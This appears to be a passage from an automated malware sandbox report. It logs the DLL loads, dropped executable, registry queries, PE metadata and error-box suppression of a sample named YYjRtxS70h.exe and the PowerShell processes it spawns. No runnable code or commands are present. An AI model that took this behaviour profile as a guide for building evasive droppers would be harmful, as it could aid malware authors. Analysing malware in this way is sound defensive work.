Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: apphelp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: sspicli.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: wininet.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: rstrtmgr.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: ncrypt.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: ntasn1.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: dbghelp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: iertutil.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: windows.storage.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: wldp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: profapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: kernel.appcore.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: winhttp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: mswsock.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: iphlpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: winnsi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: urlmon.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: srvcli.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: netutils.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: dnsapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: rasadhlp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: fwpuclnt.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: schannel.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: mskeyprotect.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: msasn1.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: dpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: cryptsp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: rsaenh.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: cryptbase.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: gpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Section loaded: ncryptsslp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: YYjRtxS70h.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YYjRtxS70h.exe Static file information: File size 13793970 > 1048576
Source: YYjRtxS70h.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: YYjRtxS70h.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: YYjRtxS70h.exe Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr Static PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02B0633D push eax; ret 4_2_02B06351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75EF0 push edx; retf 4_2_06E75EF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75E40 push edx; retf 4_2_06E75E41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75F84 push ecx; retf 4_2_06E75F85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75F0E push ecx; retf 4_2_06E75F10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75C8B push esp; retf 4_2_06E75C8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75C3B push esp; retf 4_2_06E75C3C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75DB4 push ebx; retf 4_2_06E75DB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75D3E push ebx; retf 4_2_06E75D3F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75D1F push ebx; retf 4_2_06E75D20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E75B09 push ebp; retf 4_2_06E75B0B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E760E3 push eax; retf 4_2_06E760E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E76070 push eax; retf 4_2_06E76071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E76045 push eax; retf 4_2_06E7604B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E76007 push eax; retf 4_2_06E76009
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_03396348 push eax; ret 11_2_03396351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08D15681 push ss; retf 11_2_08D15682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08D15283 push 95E8C88Bh; ret 11_2_08D15288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_02D34277 push ebx; ret 14_2_02D342DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_02D36338 push eax; ret 14_2_02D36341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_02D33ACD push ebx; retf 14_2_02D33ADA
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr Static PE information: section name: .text entropy: 6.864188260151341
Source: C:\Users\user\Desktop\YYjRtxS70h.exe File created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
